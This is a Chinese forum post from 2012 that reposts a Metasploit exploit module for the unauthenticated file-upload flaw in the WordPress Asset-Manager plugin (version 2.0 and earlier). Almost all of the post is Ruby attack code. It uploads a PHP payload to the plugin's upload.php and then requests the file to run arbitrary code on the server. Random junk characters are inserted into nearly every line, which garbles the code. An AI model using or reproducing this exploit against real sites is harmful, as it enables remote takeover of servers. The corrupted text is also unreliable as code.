这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。
6 L5 I$ o, e( b8 N/ u, c c# |* r
4 `. S. P# G4 F: o. f; g##
9 r$ ? N. ?3 j) W2 R1 c$ F: u# This file is part of the Metasploit Framework and may be subject to, `9 g- h$ H; M8 F8 Z! u
# redistribution and commercial restrictions. Please see the Metasploit
! w, ?. y" R' Q8 `8 ^5 E# Framework web site for more information on licensing and terms of use.
; j. b6 u; z1 f# http://metasploit.com/framework/
: E+ ]: h1 X9 Q& j##
+ t, P o( h6 M8 J6 f " a, v7 @; S4 [ F( N/ _
require 'msf/core'
8 K7 y0 w% W# E' Prequire 'msf/core/exploit/php_exe'
. J [. _6 d2 W/ E " i- p# [ k K
class Metasploit3 < Msf::Exploit::Remote) P/ |7 P) P" X- U J+ U6 z
Rank = ExcellentRanking
( S- b+ }2 A1 e8 w! Y2 V
" s5 Z9 U# J: x: n include Msf::Exploit::Remote::HttpClient
! q1 R1 X5 _. g! F1 j* A/ [ include Msf::Exploit: hpEXE1 C5 E- W$ G5 O, p6 l# q z
% m. N& }: g. r5 ^. e4 M
def initialize(info = {})! s4 ^2 h* t- h* |- _4 V8 C; K
super(update_info(info,
* S% y/ a0 G; u9 h 'Name' => 'WordPress Asset-Manager PHP File Upload Vulnerability',
# C6 Z; Z$ A7 g6 k- P( k: S7 C 'Description' => %q{
& @) \; x, b6 i' Y" o6 @ This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress! ~! w! i0 X' j: N
plugin. By abusing the upload.php file, a malicious user can upload a file to a
- r, L. Q/ X+ o4 l9 h8 O temp directory without authentication, which results in arbitrary code execution.
9 q. F8 }7 I' f. v },% [1 e' B4 t# Z, Z( I; z. j
'Author' =>
, \ ?& `/ t/ q: ^! Z [1 E5 t' ^( y, K/ M2 Z# b% S
'Sammy FORGIT', # initial discovery }: E7 O& N. V) ]
'James Fitts <fitts.james[at]gmail.com>' # metasploit module
8 n8 e0 ^. E/ f ],
- ~$ C- C& N. A) |% l 'License' => MSF_LICENSE,
* Q( |) f `$ A 'References' =>
+ S& Z9 C, L: e2 ^6 K* s! H9 x6 v4 m [: `& P% P' C4 ^: Z' P
[ 'OSVDB', '82653' ],( @% T: m$ J) Y3 ?; L' q
[ 'BID', '53809' ],$ J) W- f- C& ^ z
[ 'EDB', '18993' ],
& ]) k; f$ Y4 h0 k9 q+ M6 `* J( w [ 'URL', 'http:// www.myhack58.com /' ]
) y3 x" @) |1 a* v7 x) X ],
) T, g# w0 g" B! n D 'Payload' =>& j+ d9 a" K ~+ `- e% l8 Q1 x
{
V, z, M2 g8 \/ W6 N k8 s 'BadChars' => "\x00",
: _8 Z2 P, y; K( H6 I6 d/ l' i },
2 M9 m" [# Z* ?$ S1 z 'Platform' => 'php',
( J, l6 d- ~5 `% A) q2 y2 R 'Arch' => ARCH_PHP,
$ @0 \6 M/ z& ?" `, I 'Targets' =>
5 F! H/ Y. n6 B- S9 u [
& a- A1 n+ K3 b8 ]/ U0 H [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
3 |' U- R0 A& \2 i9 E: K5 \ [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]9 S6 L. p' v' }
],. ^: ^2 m* a" u/ r, t( G
'DefaultTarget' => 0,
7 S: r* A# j- g 'DisclosureDate' => 'May 26 2012'))
$ l1 K: J' e# |6 k9 r
2 Y9 |7 ~) V O& C+ E. _ register_options(
! m! S" f/ d7 q/ Q [# _, l, J( x6 X- |2 ]
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
, r5 I- G. G& R! s, Z' V* Z ], self.class)2 S) J/ k- Y! o! t4 K, O
end1 |* k3 X, R7 Q+ A. {$ D q
, e3 P5 _* r+ g! o0 p* y$ i
def exploit3 f0 T; R4 @7 O" K- L) \( r
uri = target_uri.path% f' F; g0 ~; ?0 [! N% n6 E1 i
uri << '/' if uri[-1,1] != '/'7 m$ I, ~. b V. v
peer = "#{rhost}:#{rport}": \, q0 g, V8 I- G
payload_name = "#{rand_text_alpha(5)}.php"
% V2 d, O+ a6 }$ \0 V php_payload = get_write_exec_payload(:unlink_self=>true)
1 z L! k4 l4 P2 V) O
7 x; F6 V3 n' F. V( l" l data = Rex::MIME::Message.new6 j1 Q2 A4 f# F; K1 X! o$ W
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")1 k \! {; i5 T# f2 Z
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
- \! \! F/ R* S8 R& l
0 R- z- T/ {. n5 \( r' M7 @: M! @ print_status("#{peer} - Uploading payload #{payload_name}"), s! g/ \0 M2 O t
res = send_request_cgi({4 g; }+ [! G# v
'method' => 'POST',
9 j+ Y% e/ X! { 'uri' => "#{uri}wp-content/plugins/asset-manager/upload.php",7 `- U+ H1 l3 }& L" W1 W0 J" W
'ctype' => "multipart/form-data; boundary=#{data.bound}",& _1 h3 F8 l, a) C5 i w/ @$ }
'data' => post_data
/ M @8 p1 T& @, ? })' u. o: E. k& O8 _% Q/ ?
% i0 n1 Y. |. r; ^) X# G; q if not res or res.code != 200 or res.body !~ /#{payload_name}/
- K8 T; J: c& x; q4 E: x Z fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
$ P1 I- w4 Q0 h$ H; dend
3 T3 r4 J7 k: c p# x
2 K9 H- @9 q/ S, j( V2 L! v print_status("#{peer} - Executing payload #{payload_name}")4 y9 Z- ]% v X% h9 @
res = send_request_raw({
! _0 r! z% K( Q1 X& T 'uri' => "#{uri}wp-content/uploads/assets/temp/#{payload_name}", @0 l/ s, z# K( x2 z
'method' => 'GET'
% ~, P& o2 u8 ^7 N& D$ W4 h })
3 `% D: E: _& j/ h8 i( |
* U# n7 l$ H4 f# @ if res and res.code != 200, n1 @, B* _6 ^4 f0 s* C
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
2 t% A6 V+ m c- F. q/ N. K x6 S end
; ^& n& ]" \: z" a/ E5 C6 t8 W end/ Z6 P2 A; y/ G) `2 v
end
! J/ R. |5 H; _5 T |
发表于 2012-12-31 09:22:33
收藏
支持
反对